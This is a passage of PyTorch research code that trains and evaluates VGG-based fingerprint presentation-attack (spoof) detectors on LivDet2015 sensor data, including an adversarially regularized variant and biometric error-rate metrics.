train_history['val_bpcer'].append(val_bpcer)\n train_history['val_eer'].append(val_eer)\n train_history['val_bpcer_apcer1'].append(val_bpcer_apcer1)\n train_history['val_bpcer_apcer5'].append(val_bpcer_apcer5)\n train_history['val_bpcer_apcer10'].append(val_bpcer_apcer10)\n train_history['val_apcer1'].append(val_apcer1)\n train_history['val_apcer5'].append(val_apcer5)\n train_history['val_apcer10'].append(val_apcer10)\n\n\n # save best validation model\n if best_val < val_acc:\n torch.save(model.state_dict(), model_path + 'vgg_fpad.pth')\n best_val = val_acc\n best_epoch = epoch\n\n # display the training loss\n print()\n print('\\n>> Train loss: {:.3f} |'.format(tr_loss.item()) + ' Train Acc: {:.3f}'.format(tr_acc) + '\\n Train APCER: {:.3f} |'.format(tr_apcer) + ' Train BPCER: {:.3f}'.format(tr_bpcer) + '\\n Train EER: {:.3f}'.format(tr_eer))\n\n print('\\n>> Valid loss: {:.3f} |'.format(val_loss.item()) + ' Valid Acc: {:.3f}'.format(val_acc) + '\\n Valid APCER: {:.3f} |'.format(val_apcer) + ' Valid BPCER: {:.3f}'.format(val_bpcer) + '\\n Valid EER: {:.3f}'.format(val_eer))\n\n print('\\n>> Best model: {} / Acc={:.3f}'.format(best_epoch+1, best_val))\n print()\n\n # save train/valid history\n plot_fn = output + 'vgg_fpad_history.png'\n plot_train_history(train_history, plot_fn=plot_fn)\n\n # return best validation model\n model.load_state_dict(torch.load(model_path + 'vgg_fpad.pth'))\n\n return model, train_history, valid_loader, best_epoch+1\n\n\ndef plot_train_history(train_history, plot_fn=None):\n plt.switch_backend('agg')\n\n best_val_epoch = np.argmin(train_history['val_loss'])\n best_val_acc = train_history['val_acc'][best_val_epoch]\n best_val_loss = train_history['val_loss'][best_val_epoch]\n plt.figure(figsize=(7, 5))\n epochs = len(train_history['train_loss'])\n x = range(epochs)\n plt.subplot(211)\n plt.plot(x, train_history['train_loss'], 'r-')\n plt.plot(x, train_history['val_loss'], 'g-')\n plt.plot(best_val_epoch, best_val_loss, 'bx')\n 
plt.xlabel('Epoch')\n plt.ylabel('Train/Val loss')\n plt.legend(['train_loss', 'val_loss'])\n plt.axis([0, epochs, 0, max(train_history['train_loss'])])\n plt.subplot(212)\n plt.plot(x, train_history['train_acc'], 'r-')\n plt.plot(x, train_history['val_acc'], 'g-')\n plt.plot(best_val_epoch, best_val_acc, 'bx')\n plt.xlabel('Epoch')\n plt.ylabel('Train/Val acc')\n plt.legend(['train_acc', 'val_acc'])\n plt.axis([0, epochs, 0, 1])\n if plot_fn:\n #plt.show()\n plt.savefig(plot_fn)\n plt.close()\n else:\n plt.show()\n\n\ndef eval_model(model, data_loader, device, debug=False):\n with torch.no_grad():\n\n model.eval()\n \n loss_eval = 0\n N = 0\n n_correct = 0\n \n TP = 0\n TN = 0\n FP = 0\n FN = 0\n \n PA = 0\n BF = 0\n \n eer_list = []\n \n BPCER_APCER1_list = []\n BPCER_APCER5_list = []\n BPCER_APCER10_list = []\n \n APCER1_list = []\n APCER5_list = []\n APCER10_list = []\n \n for i, (x, y, f, _) in enumerate(data_loader):\n # send mini-batch to gpu\n x = x.to(device)\n \n y = y.type(torch.LongTensor)\n y = y.to(device)\n \n f = f.type(torch.LongTensor)\n f = f.to(device)\n\n # forward pass \n y_pred = model(x)\n\n # Compute cnn loss\n loss = loss_fn(y_pred, y)\n loss_eval += loss * x.shape[0]\n\n # Compute Acc\n N += x.shape[0]\n ypred_ = torch.argmax(y_pred, dim=1)\n n_correct += torch.sum(1.*(ypred_ == y)).item()\n \n y = y.cpu().numpy()\n ypred_ = ypred_.cpu().numpy()\n \n # Biometric metrics\n \n TP += np.sum(np.logical_and(ypred_, y))\n TN += np.sum(np.logical_and(1-ypred_, 1-y))\n \n FP += np.sum(np.logical_and(ypred_, 1-y))\n FN += np.sum(np.logical_and(1-ypred_, y))\n \n PA += np.sum(y == 0)\n BF += np.sum(y == 1)\n \n \n probs = torch.nn.functional.softmax(y_pred, dim=0)\n\n probs = probs.cpu().numpy()\n\n probs = probs[:, 1]\n \n fpr, tpr, threshold = metrics.roc_curve(y, probs)\n fnr = 1 - tpr \n \n BPCER_APCER1_list.append(fpr[(np.abs(fnr - 0.01)).argmin()])\n BPCER_APCER5_list.append(fpr[(np.abs(fnr - 0.05)).argmin()])\n 
BPCER_APCER10_list.append(fpr[(np.abs(fnr - 0.1)).argmin()])\n \n APCER1_list.append(fnr[(np.abs(fnr - 0.01)).argmin()])\n APCER5_list.append(fnr[(np.abs(fnr - 0.05)).argmin()])\n APCER10_list.append(fnr[(np.abs(fnr - 0.1)).argmin()])\n \n index = _nanargmin(np.absolute((fnr - fpr)))\n if math.isnan(index) == False:\n eer_list.append(fpr[index])\n\n loss_eval = loss_eval / N\n acc = n_correct / N\n APCER = (FP * 1.) / (FP + TN)\n BPCER = (FN * 1.) / (FN + TP)\n \n BPCER_APCER1=mean(BPCER_APCER1_list)\n BPCER_APCER5=mean(BPCER_APCER5_list)\n BPCER_APCER10=mean(BPCER_APCER10_list)\n \n APCER1=mean(APCER1_list)\n APCER5=mean(APCER5_list)\n APCER10=mean(APCER10_list)\n \n if eer_list != []:\n EER = mean(eer_list)\n else:\n EER = -1000000000\n \n return loss_eval, acc, APCER, BPCER, EER, BPCER_APCER1, BPCER_APCER5, BPCER_APCER10, APCER1, APCER5, APCER10 \n\n\ndef main():\n \n IMG_PATH = \"/ctm-hdd-pool01/DB/LivDet2015/train/\"\n \n print()\n if torch.cuda.is_available():\n DEVICE = torch.device(\"cuda:0\") # you can continue going on here, like cuda:1 cuda:2....etc. \n print(\"Running on the GPU\")\n else:\n DEVICE = torch.device(\"cpu\")\n print(\"Running on the CPU\")\n \n mode = input(\"Enter the mode [train/test]: \")\n #DATASET = input(\"Dataset [CrossMatch/Digital_Persona/GreenBit/Hi_Scan/Time_Series]: \")\n unseen_ = input(\"Unseen attack? 
[y/n]: \")\n \n if unseen_ == \"y\":\n unseen = True\n NUM_ITERATIONS = 1\n attack_txt = \"UA\"\n elif unseen_ == \"n\":\n unseen = False \n NUM_ITERATIONS = 3\n attack_txt = \"OA\"\n else:\n sys.exit(\"Error ('Unseen attack?'): incorrect input!\")\n \n sensors = [\"CrossMatch\", \"Digital_Persona\", \"GreenBit\", \"Hi_Scan\", \"Time_Series\"] \n \n for DATASET in sensors:\n \n print(\"\\nRunning in \" + DATASET + \"...\\n\")\n \n if DATASET == \"CrossMatch\" or DATASET==\"Time_Series\":\n NUM_MATERIALS = 3\n else:\n NUM_MATERIALS = 4\n \n # For LOOP - Test splits\n train_results_ = []\n results = []\n best_epochs = [] \n \n for iteration in range(NUM_ITERATIONS):\n \n print(\"\\n-- ITERATION {}/{} --\".format(iteration+1, NUM_ITERATIONS))\n \n for test_material in range(NUM_MATERIALS):\n \n output_fn = \"results/\" + DATASET + \"/\" + DATASET + \"_\" + str(test_material) + \"_\"\n model_path = \"/ctm-hdd-pool01/afpstudents/jaf/VGG19bn_\" + DATASET + \"_\" + str(test_material) + \"_\"\n \n model = models.vgg11_bn(pretrained=True)\n set_parameter_requires_grad(model, feature_extracting=False)\n num_ftrs = model.classifier[6].in_features\n model.classifier[6] = nn.Linear(num_ftrs,2)\n \n model = model.to(DEVICE)\n \n # Train or test\n if mode == 'train':\n \n (train_loader, valid_loader, test_loader) = get_data_loaders(IMG_PATH, DATASET, test_material, croped=True, unseen_attack=unseen)\n \n \n # Fit model\n model, train_history, _, best_epoch = fit(model=model,\n data=(train_loader, valid_loader),\n device=DEVICE,\n model_path = model_path, \n output=output_fn)\n \n # save train history\n train_res_fn = output_fn + \"history.pckl\"\n pickle.dump(train_history, open(train_res_fn, \"wb\"))\n \n elif mode == 'test':\n sys.exit(\"Error: in construction yet!\")\n '''\n model.load_state_dict(torch.load(\n os.path.join(*(output_fn, 'mlp_fpad.pth'))))\n \n # load train history\n res_fn = os.path.join(*(output_fn, '_history.pckl'))\n train_history = pickle.load(open(res_fn, 
\"rb\"))\n plot_fn = os.path.join(*(output_fn, 'mlp_fpad_history.png'))\n plot_train_history(train_history, plot_fn=plot_fn)\n '''\n else:\n sys.exit(\"Error: incorrect mode!\")\n \n #Train results\n train_results = pickle.load(open(train_res_fn, \"rb\"))\n train_results_.append([train_results['train_acc'][EPOCHS-1], train_results['train_apcer'][EPOCHS-1], train_results['train_bpcer'][EPOCHS-1], train_results['train_eer'][EPOCHS-1], train_results['train_bpcer_apcer1'][EPOCHS-1], train_results['train_bpcer_apcer5'][EPOCHS-1], train_results['train_bpcer_apcer10'][EPOCHS-1], train_results['train_apcer1'][EPOCHS-1], train_results['train_apcer5'][EPOCHS-1], train_results['train_apcer10'][EPOCHS-1]])\n \n # Test results\n test_loss, test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10 = eval_model(model, test_loader, DEVICE)\n print('\\nTest loss: {:.3f} |'.format(test_loss.item()) + ' Test Acc: {:.3f}'.format(test_acc) + '\\nTest APCER: {:.3f} |'.format(test_apcer) + ' Test BPCER: {:.3f}'.format(test_bpcer)) \n print('Test BPCER@APCER=1%: {:.3f} | Test APCER1: {:.3f}'.format(test_bpcer_apcer1, test_apcer1))\n print('Test BPCER@APCER=5%: {:.3f} | Test APCER5: {:.3f}'.format(test_bpcer_apcer5, test_apcer5))\n print('Test BPCER@APCER=10%: {:.3f} | Test APCER10: {:.3f}'.format(test_bpcer_apcer10, test_apcer10))\n print('Test EER: {:.3f}'.format(test_eer))\n results.append((test_loss.item(), test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10))\n \n best_epochs.append(best_epoch)\n \n # save results\n res_fn = output_fn + 'results.pckl'\n pickle.dump(results, open(res_fn, \"wb\"))\n results = pickle.load(open(res_fn, \"rb\"))\n \n \n \n # Compute average and std\n acc_array = np.array([i[1] for i in results])\n apcer_array = np.array([i[2] for i in results])\n bpcer_array = np.array([i[3] for i in 
results])\n eer_array = np.array([i[4] for i in results])\n bpcer_apcer1_array = np.array([i[5] for i in results])\n bpcer_apcer5_array = np.array([i[6] for i in results])\n bpcer_apcer10_array = np.array([i[7] for i in results])\n apcer1_array = np.array([i[8] for i in results])\n apcer5_array = np.array([i[9] for i in results])\n apcer10_array = np.array([i[10] for i in results])\n \n print('\\n\\n\\n---------------------------------\\n-------------------------------------------')\n print('Average Acc: {:.3f} |'.format(np.mean(acc_array)) + ' Std: {:.3f}'.format(np.std(acc_array)))\n print('Average APCER: {:.3f} |'.format(np.mean(apcer_array)) + ' Std: {:.3f}'.format(np.std(apcer_array)))\n print('Average BPCER: {:.3f} |'.format(np.mean(bpcer_array)) + ' Std: {:.3f}'.format(np.std(bpcer_array)))\n print('Average EER: {:.3f} |'.format(np.mean(eer_array)) + ' Std: {:.3f}'.format(np.std(eer_array)))\n print('Average BPCER@APCER=1%: {:.3f} |'.format(np.mean(bpcer_apcer1_array)) + ' Std: {:.3f}'.format(np.std(bpcer_apcer1_array)))\n print('Average BPCER@APCER=5%: {:.3f} |'.format(np.mean(bpcer_apcer5_array)) + ' Std: {:.3f}'.format(np.std(bpcer_apcer5_array)))\n print('Average BPCER@APCER=10%: {:.3f} |'.format(np.mean(bpcer_apcer10_array)) + ' Std: {:.3f}'.format(np.std(bpcer_apcer10_array)))\n print('Average APCER1: {:.3f} |'.format(np.mean(apcer1_array)) + ' Std: {:.3f}'.format(np.std(apcer1_array)))\n print('Average APCER5: {:.3f} |'.format(np.mean(apcer5_array)) + ' Std: {:.3f}'.format(np.std(apcer5_array)))\n print('Average APCER10: {:.3f} |'.format(np.mean(apcer10_array)) + ' Std: {:.3f}'.format(np.std(apcer10_array)))\n \n #Best epochs\n print('\\nBest epochs:', end=\" \")\n for epoch in best_epochs:\n print(epoch, end=\" \")\n \n #Results of all loops (train and test)\n np.set_printoptions(formatter={'float': '{: 0.3f}'.format})\n print()\n print()\n print(\"*** \" + DATASET + \" RESULTS ***\")\n print()\n print(\">>Train results [Acc, APCER, BPCER, EER, 
BPCER@APCER=1%, BPCER@APCER=5%, BPCER@APCER=10%, APCER1, APCER5, APCER10]\")\n print()\n for k in range(NUM_MATERIALS):\n print(*train_results_[k], sep = \", \") \n \n print()\n print()\n print(\">>Test results\")\n \n results_test = []\n \n for j in range(len(list(acc_array))):\n res = []\n res.append(acc_array[j])\n res.append(apcer_array[j])\n res.append(bpcer_array[j])\n res.append(eer_array[j])\n res.append(bpcer_apcer1_array[j])\n res.append(bpcer_apcer5_array[j])\n res.append(bpcer_apcer10_array[j])\n res.append(apcer1_array[j])\n res.append(apcer1_array[j])\n res.append(apcer10_array[j])\n \n print(*res, sep = \", \") \n \n results_test.append(res)\n \n if iteration == NUM_ITERATIONS-1: \n np.savetxt(DATASET + '_' + attack_txt + '_test.txt', results_test, fmt='%.3f', delimiter=',')\n \n '''\n print()\n print()\n print(\">>Test results\")\n print()\n print(\"Acc: {}\".format(acc_array))\n print(\"APCER: {}\".format(apcer_array))\n print(\"BPCER: {}\".format(bpcer_array))\n print(\"EER: {}\".format(eer_array))\n print(\"BPCER@APCER=1%: {}\".format(bpcer_apcer1_array))\n print(\"BPCER@APCER=5%: {}\".format(bpcer_apcer5_array))\n print(\"BPCER@APCER=10%: {}\".format(bpcer_apcer10_array))\n print(\"APCER1: {}\".format(apcer1_array))\n print(\"APCER5: {}\".format(apcer5_array))\n print(\"APCER10: {}\".format(apcer10_array))\n '''\n \n print(\"\\n\\nDONE!\")\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.48284709453582764, "alphanum_fraction": 0.4965992569923401, "avg_line_length": 41.757652282714844, "blob_id": "d6e0a5cb57db753ae865a98405e6ffed46057d34", "content_id": "35d790e34e0e56159e1d419adafb4327aaea11b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 33522, "license_type": "no_license", "max_line_length": 465, "num_lines": 784, "path": "/VGG/run_vgg_reg.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": 
"UTF-8", "text": "import os\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.nn import functional as F\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\nfrom statistics import mean\nimport pickle\nimport math\nimport sys\nimport torchvision.models as models\n\nsys.path.insert(0, 'utils/')\nsys.path.insert(0, 'data/')\nsys.path.insert(0, 'models/')\nsys.path.insert(0, 'layers/')\nsys.path.insert(0, 'losses/')\n\nfrom vgg_utils import _nanargmin, set_parameter_requires_grad, frange\nfrom data_vgg import get_data_loaders\n\nfrom losses_fpad import softCrossEntropyUniform, signer_transfer_loss\n\n#%%\n\n# layers to regularize\nCONV_LAYERS = -1\n\ndef split_batch_per_signer(x, y, g_norm, h_conv, y_task, n_signers):\n\n \n \"\"\"split data per signer identity\n\n Parameters:\n x (type): batch of data\n y (type): batch of gesture labels\n g_norm (type): batch of signer iodentities labels\n h_conv (type): activations of conv layers\n h_dense (type): activations of dense layers\n y_task (type): class labels predictions\n n_signers (type): number of training signer identities\n\n Returns:\n x_split (type): x splitted by signer identity\n y_split (type): y splitted by signer identity\n g_split (type): g splitted by signer identity\n h_conv_split (type): h_conv splitted by signer identity\n h_dense_split (type): h_dense splitted by signer identity\n y_task_split (type): y_task splitted by signer identity\n\n \"\"\"\n x_split = [False]*n_signers\n y_split = [False]*n_signers\n g_split = [False]*n_signers\n y_task_split = [False]*n_signers\n h_conv_split = [False]*n_signers\n\n for s in range(n_signers):\n x_split[s] = x[g_norm == s]\n y_split[s] = y[g_norm == s]\n g_split[s] = g_norm[g_norm == s]\n\n h_conv_split[s] = [torch.mean(h[g_norm == s], dim=0)\n for h in h_conv[CONV_LAYERS:]]\n y_task_split[s] = y_task[g_norm == s]\n\n return x_split, y_split, g_split, h_conv_split, y_task_split\n\n\n#%% \n\nEPOCHS = 100\n\nloss_fn = 
F.cross_entropy\n\nLEARNING_RATE = 1e-04\nREG = 1e-04\n\n#Regularization weights for optimization\nADV_WEIGHT_LIST = frange(0, 1, 0.1)\nTRANSFER_WEIGHT_LIST = frange(0, 1, 0.1)\n\n#Regularization weights for training\nADV_WEIGHT_ = 0 #0.23\nTRANSFER_WEIGHT_ = 0 #0.64\n\ndef fit(model, data, device, model_path, output, unseen, n_fake, unknown_material, adv_weight, transfer_weight, optimization = False, step = -1):\n # train and validation loaders\n train_loader, valid_loader = data\n print(\"Train/Val batches: {}/{}\".format(len(train_loader),\n len(valid_loader)))\n \n feature_extractor = torch.nn.Sequential(*list(model.children())[0:2])\n\n task_classifier = torch.nn.Sequential(*list(model.children())[2])\n \n adv_classifier = torch.nn.Sequential(*list(model.children())[2])\n num_ftrs = model.classifier[6].in_features\n adv_classifier[6] = nn.Linear(num_ftrs,3)\n \n feature_extractor = feature_extractor.to(device)\n task_classifier = task_classifier.to(device)\n adv_classifier = adv_classifier.to(device)\n\n # Set the optimizer\n task_opt = torch.optim.Adam(list(feature_extractor.parameters()) + \n list(task_classifier.parameters()),\n lr=LEARNING_RATE,\n weight_decay=REG)\n\n adv_opt = torch.optim.Adam(list(adv_classifier.parameters()),\n lr=LEARNING_RATE,\n weight_decay=REG)\n\n # Start training\n train_history = {'train_loss': [], 'train_task_loss': [], 'train_transf_loss': [], 'train_adv_loss': [], 'train_ce_uniform_loss': [], 'train_acc': [], 'train_apcer': [], 'train_bpcer': [], 'train_eer': [], 'train_bpcer_apcer1': [], 'train_bpcer_apcer5': [], 'train_bpcer_apcer10': [], 'train_apcer1': [], 'train_apcer5': [], 'train_apcer10': [],\n 'val_loss': [], 'val_task_loss': [], 'val_transf_loss': [], 'val_adv_loss': [], 'val_ce_uniform_loss': [], 'val_acc': [], 'val_apcer': [], 'val_bpcer': [], 'val_eer': [], 'val_bpcer_apcer1': [], 'val_bpcer_apcer5': [], 'val_bpcer_apcer10': [], 'val_apcer1': [], 'val_apcer5': [], 'val_apcer10': []}\n\n # Best validation params\n 
best_val = -float('inf')\n best_epoch = 0\n\n for epoch in range(EPOCHS):\n \n if optimization:\n num_steps = len(ADV_WEIGHT_LIST)*len(TRANSFER_WEIGHT_LIST)\n print('\\n*** EPOCH {}/{} - Optimization step {}/{} - Material {}\\n'.format(epoch + 1, EPOCHS, step, num_steps, unknown_material))\n else:\n print('\\n*** EPOCH {}/{} - Material {}\\n'.format(epoch + 1, EPOCHS, unknown_material))\n\n # TRAINING\n model.train()\n for i, (x, y, f, f_norm) in enumerate(train_loader):\n\n x = x.to(device)\n\n \n y = y.type(torch.LongTensor)\n y = y.to(device)\n \n f = f.type(torch.LongTensor)\n f = f.to(device)\n \n f_norm = f_norm.type(torch.LongTensor)\n f_norm = f_norm.to(device)\n \n # split real and fake observations\n x_real = x[f == -1]\n x_fake = x[f != -1]\n \n if x_real.shape[0] == 0 or x_fake.shape[0] == 0 :\n continue\n \n y_real = y[f == -1]\n y_fake = y[f != -1]\n y_concat = torch.cat([y_real, y_fake], dim=0)\n \n f_norm_fake = f_norm[f != -1]\n \n \n # forward pass\n h_conv = feature_extractor(x) \n h_fake = feature_extractor(x_fake)\n \n h_conv_flat = h_conv.view(h_conv.size(0), -1)\n h_fake_flat = h_fake.view(h_fake.size(0), -1)\n \n \n y_task = task_classifier(h_conv_flat)\n y_adv = adv_classifier(h_fake_flat)\n \n # Compute task-specific loss\n task_loss = loss_fn(y_task, y)\n \n # Compute adversial loss\n adv_loss = loss_fn(y_adv, f_norm_fake)\n \n \n # Compute signer-transfer loss (split activations per fake material)\n x_split, y_split, g_split, h_conv_split, y_task_split = split_batch_per_signer(x, y, f_norm, [h_conv], y_task, n_fake-1)\n fake_on_batch = [i for i in range(len(g_split)) if len(g_split[i])]\n\n if len(fake_on_batch) <= 1:\n transfer_loss = torch.tensor(0.0)\n else:\n transfer_loss = signer_transfer_loss(h_conv_split, fake_on_batch)\n\n # Joint\n loss = (task_loss + adv_weight*softCrossEntropyUniform(y_adv) + transfer_loss*transfer_weight)\n \n \n task_opt.zero_grad()\n loss.backward(retain_graph=True)\n task_opt.step()\n\n \n 
adv_opt.zero_grad()\n adv_loss.backward()\n adv_opt.step()\n \n \n # display the mini-batch loss\n sys.stdout.write(\"\\r\" + '........{}/{} mini-batch loss: {:.3f} |'\n .format(i + 1, len(train_loader), loss.item()) +\n ' task_loss: {:.3f} |'\n .format(task_loss.item()) +\n ' transfer_loss: {:.3f} |'\n .format(transfer_loss.item()) +\n ' adv_loss: {:.3f}'\n .format(adv_loss.item()))\n sys.stdout.flush()\n \n # Validation\n tr_loss, tr_task_loss, tr_transf_loss, tr_adv_loss, tr_ce_uniform_loss, tr_acc, tr_apcer, tr_bpcer, tr_eer, tr_bpcer_apcer1, tr_bpcer_apcer5, tr_bpcer_apcer10, tr_apcer1, tr_apcer5, tr_apcer10 = eval_model(model, train_loader, device, n_fake=n_fake, adv_weight = adv_weight, transfer_weight = transfer_weight, is_train=True)\n train_history['train_loss'].append(tr_loss.item())\n train_history['train_task_loss'].append(tr_task_loss.item())\n \n if unseen == True:\n if isinstance(tr_transf_loss, float) == False:\n train_history['train_transf_loss'].append(tr_transf_loss.item())\n else:\n train_history['train_transf_loss'].append(tr_transf_loss)\n \n \n train_history['train_adv_loss'].append(tr_adv_loss.item())\n train_history['train_ce_uniform_loss'].append(tr_ce_uniform_loss.item())\n train_history['train_acc'].append(tr_acc)\n train_history['train_apcer'].append(tr_apcer)\n train_history['train_bpcer'].append(tr_bpcer)\n train_history['train_eer'].append(tr_eer)\n train_history['train_bpcer_apcer1'].append(tr_bpcer_apcer1)\n train_history['train_bpcer_apcer5'].append(tr_bpcer_apcer5)\n train_history['train_bpcer_apcer10'].append(tr_bpcer_apcer10)\n train_history['train_apcer1'].append(tr_apcer1)\n train_history['train_apcer5'].append(tr_apcer5)\n train_history['train_apcer10'].append(tr_apcer10)\n\n val_loss, val_task_loss, val_transf_loss, val_adv_loss, val_ce_uniform_loss, val_acc, val_apcer, val_bpcer, val_eer, val_bpcer_apcer1, val_bpcer_apcer5, val_bpcer_apcer10, val_apcer1, val_apcer5, val_apcer10 = eval_model(model, valid_loader, device, 
n_fake=n_fake, adv_weight = adv_weight, transfer_weight = transfer_weight)\n train_history['val_loss'].append(val_loss.item())\n train_history['val_task_loss'].append(val_task_loss.item())\n train_history['val_acc'].append(val_acc)\n train_history['val_apcer'].append(val_apcer)\n train_history['val_bpcer'].append(val_bpcer)\n train_history['val_eer'].append(val_eer)\n train_history['val_bpcer_apcer1'].append(val_bpcer_apcer1)\n train_history['val_bpcer_apcer5'].append(val_bpcer_apcer5)\n train_history['val_bpcer_apcer10'].append(val_bpcer_apcer10)\n train_history['val_apcer1'].append(val_apcer1)\n train_history['val_apcer5'].append(val_apcer5)\n train_history['val_apcer10'].append(val_apcer10)\n\n\n # save best validation model\n if best_val < val_acc:\n torch.save(model.state_dict(), model_path + 'cnn2_reg_fpad.pth')\n best_val = val_acc\n best_epoch = epoch\n\n # display the training loss\n print()\n print('\\n>> Train loss: {:.3f} |'.format(tr_loss.item()) + ' Train Acc: {:.3f}'.format(tr_acc) + '\\n Train APCER: {:.3f} |'.format(tr_apcer) + ' Train BPCER: {:.3f}'.format(tr_bpcer) + '\\n Train EER: {:.3f}'.format(tr_eer))\n\n print('\\n>> Train task loss: {:.3f} |'.format(tr_task_loss.item()) + ' Train transfer loss: {:.3f}'.format(tr_transf_loss) + '\\n Train adversarial loss: {:.3f} |'.format(tr_adv_loss) + ' Train CE Uniform loss: {:.3f}'.format(tr_ce_uniform_loss.item()) )\n\n print('\\n>> Valid task loss: {:.3f}'.format(val_task_loss.item()) )\n\n print('\\n>> Valid loss: {:.3f} |'.format(val_loss.item()) + ' Valid Acc: {:.3f}'.format(val_acc) + '\\n Valid APCER: {:.3f} |'.format(val_apcer) + ' Valid BPCER: {:.3f}'.format(val_bpcer) + '\\n Valid EER: {:.3f}'.format(val_eer))\n\n if optimization == False:\n print('\\n>> Best model: {} / Acc={:.3f}'.format(best_epoch+1, best_val))\n \n print()\n\n if unseen == True:\n # save train/valid history\n plot_fn = output + 'cnn2_reg_fpad_history_TASK.png'\n plot_train_history(train_history, plot_fn=plot_fn)\n\n # 
return best validation model\n model.load_state_dict(torch.load(model_path + 'cnn2_reg_fpad.pth'))\n\n return model, train_history, valid_loader, best_epoch+1\n\n\ndef plot_train_history(train_history, plot_fn=None):\n plt.switch_backend('agg')\n\n best_val_epoch = np.argmin(train_history['val_loss'])\n best_val_acc = train_history['val_acc'][best_val_epoch]\n best_val_loss = train_history['val_loss'][best_val_epoch]\n plt.figure(figsize=(7, 5))\n epochs = len(train_history['train_loss'])\n x = range(epochs)\n plt.subplot(211)\n plt.plot(x, train_history['train_loss'], 'r-')\n plt.plot(x, train_history['val_loss'], 'g-')\n plt.plot(best_val_epoch, best_val_loss, 'bx')\n plt.xlabel('Epoch')\n plt.ylabel('Train/Val loss')\n plt.legend(['train_loss', 'val_loss'])\n plt.axis([0, epochs, 0, max(train_history['train_loss'])])\n plt.subplot(212)\n plt.plot(x, train_history['train_acc'], 'r-')\n plt.plot(x, train_history['val_acc'], 'g-')\n plt.plot(best_val_epoch, best_val_acc, 'bx')\n plt.xlabel('Epoch')\n plt.ylabel('Train/Val acc')\n plt.legend(['train_acc', 'val_acc'])\n plt.axis([0, epochs, 0, 1])\n if plot_fn:\n #plt.show()\n plt.savefig(plot_fn)\n plt.close()\n else:\n plt.show()\n\n\ndef eval_model(model, data_loader, device, n_fake, adv_weight, transfer_weight, debug=False, is_train=False):\n\n feature_extractor = torch.nn.Sequential(*list(model.children())[0:2])\n\n task_classifier = torch.nn.Sequential(*list(model.children())[2])\n \n adv_classifier = torch.nn.Sequential(*list(model.children())[2])\n num_ftrs = model.classifier[6].in_features\n adv_classifier[6] = nn.Linear(num_ftrs,3)\n \n feature_extractor = feature_extractor.to(device)\n task_classifier = task_classifier.to(device)\n adv_classifier = adv_classifier.to(device)\n \n with torch.no_grad():\n\n model.eval()\n \n loss_eval = 0\n task_loss_eval = 0\n transf_loss_eval = 0\n adv_loss_eval = 0\n CE_unif_loss_eval = 0\n \n N = 0\n n_correct = 0\n \n TP = 0\n TN = 0\n FP = 0\n FN = 0\n \n PA = 0\n BF = 
0\n \n eer_list = []\n \n BPCER_APCER1_list = []\n BPCER_APCER5_list = []\n BPCER_APCER10_list = []\n \n APCER1_list = []\n APCER5_list = []\n APCER10_list = []\n \n \n for i, (x, y, f, f_norm) in enumerate(data_loader):\n # send mini-batch to gpu\n x = x.to(device)\n\n \n y = y.type(torch.LongTensor)\n y = y.to(device)\n \n f = f.type(torch.LongTensor)\n f = f.to(device)\n \n f_norm = f_norm.type(torch.LongTensor)\n f_norm = f_norm.to(device)\n \n # split real and fake observations\n x_real = x[f == -1]\n x_fake = x[f != -1]\n \n if x_real.shape[0] == 0 or x_fake.shape[0] == 0 :\n continue\n \n y_real = y[f == -1]\n y_fake = y[f != -1]\n y_concat = torch.cat([y_real, y_fake], dim=0)\n \n f_norm_fake = f_norm[f != -1]\n \n \n # forward pass\n h_conv = feature_extractor(x) \n h_fake = feature_extractor(x_fake)\n \n h_conv_flat = h_conv.view(h_conv.size(0), -1)\n h_fake_flat = h_fake.view(h_fake.size(0), -1)\n \n \n y_task = task_classifier(h_conv_flat)\n y_adv = adv_classifier(h_fake_flat)\n \n\n # Compute task-specific loss\n task_loss = loss_fn(y_task, y)\n \n \n # Compute adversial loss\n adv_loss = 0\n if is_train and f_norm_fake.shape[0] != 0:\n adv_loss = loss_fn(y_adv, f_norm_fake)\n\n # Compute signer-transfer loss\n # split activations per fake material\n # Compute signer-transfer loss (split activations per fake material)\n x_split, y_split, g_split, h_conv_split, y_task_split = split_batch_per_signer(x, y, f_norm, [h_conv], y_task, n_fake-1)\n fake_on_batch = [i for i in range(len(g_split)) if len(g_split[i])]\n\n if len(fake_on_batch) <= 1:\n transfer_loss = torch.tensor(0.0)\n else:\n transfer_loss = signer_transfer_loss(h_conv_split, fake_on_batch)\n\n # Joint\n loss = (task_loss + adv_weight*softCrossEntropyUniform(y_adv) + transfer_loss*transfer_weight)\n \n \n # Sum losses\n loss_eval += loss * x.shape[0]\n task_loss_eval += task_loss * x.shape[0]\n transf_loss_eval += transfer_loss * x.shape[0]\n adv_loss_eval += adv_loss * x.shape[0]\n 
CE_unif_loss_eval += softCrossEntropyUniform(y_adv) * x.shape[0]\n\n # Compute Acc\n N += x.shape[0]\n ypred_ = torch.argmax(y_task, dim=1)\n n_correct += torch.sum(1.*(ypred_ == y_concat)).item()\n \n y_concat = y_concat.cpu().numpy()\n ypred_ = ypred_.cpu().numpy()\n \n # Biometric metrics\n \n TP += np.sum(np.logical_and(ypred_, y_concat))\n TN += np.sum(np.logical_and(1-ypred_, 1-y_concat))\n \n FP += np.sum(np.logical_and(ypred_, 1-y_concat))\n FN += np.sum(np.logical_and(1-ypred_, y_concat))\n \n PA += np.sum(y_concat == 0)\n BF += np.sum(y_concat == 1)\n \n #probs = model.predict(x)\n \n probs = F.softmax(y_task, dim=1)\n \n probs = probs.cpu().numpy()\n\n probs = probs[:, 1]\n \n fpr, tpr, threshold = metrics.roc_curve(y_concat, probs)\n fnr = 1 - tpr \n \n BPCER_APCER1_list.append(fpr[(np.abs(fnr - 0.01)).argmin()])\n BPCER_APCER5_list.append(fpr[(np.abs(fnr - 0.05)).argmin()])\n BPCER_APCER10_list.append(fpr[(np.abs(fnr - 0.1)).argmin()])\n \n APCER1_list.append(fnr[(np.abs(fnr - 0.01)).argmin()])\n APCER5_list.append(fnr[(np.abs(fnr - 0.05)).argmin()])\n 